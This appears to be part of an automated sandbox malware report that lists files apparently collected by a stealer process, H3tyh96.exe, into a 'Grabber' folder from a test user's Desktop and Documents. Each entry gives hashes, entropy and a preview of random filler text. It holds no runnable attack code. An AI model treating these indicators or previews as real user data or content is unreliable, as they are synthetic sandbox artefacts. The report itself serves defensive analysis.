Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\PALRGUCVEH.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\ZIPXYXWIOY.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	true
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZIPXYXWIOY.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
